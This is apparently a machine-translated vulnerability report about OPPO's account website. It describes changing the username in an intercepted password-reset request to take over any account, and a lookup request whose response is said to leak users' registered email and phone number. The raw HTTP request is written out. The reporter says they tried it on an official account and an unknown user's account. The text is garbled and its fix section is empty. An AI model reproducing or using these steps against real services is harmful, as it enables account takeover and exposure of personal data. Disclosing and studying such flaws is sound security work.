OPPO modifies any account password

1. register an account and bind it to a mobile phone. 2. Exit the registered account and use the password retrieval function. 3. Normally, enter the account at registration. The registered mobile phone will receive the verification code, enter the verification code and new password for submission. In this case, use the data packet capture software to capture packets and change the username in the data packet to the target account or any account, after post, you can use your own password to log on to your target account. Another point is that the forgot password function can also leak user information, enter the account you want to retrieve the password and capture the package. In the returned package, you can see the user's registered email address and mobile phone number. No code! POST/sysadmin/htm/index. php? Q = user/checkaccount HTTP/1.1 Host: account. oppo. comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv: 19.0) Gecko/20100101 Firefox/19.0 Accept: */* Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset = UTF-8X-Requested-With: XMLHttpRequestReferer: http://account.oppo.com/sysadmin/htm/index.php? Q = user/getbackpass & back =/sysadmin/htm/index. php? Q = myoppo/indexContent-Length: 29 Cookie: PHPSESSID = login; Connection: keep-alivePragma: no-cacheCache-Control: no-cache useracc = enter the account name & smsact = getpass
First, take the official oppo beauty for a test and then an unknown diaosi account.
 Solution:

It seems that programmers cannot fix bugs today.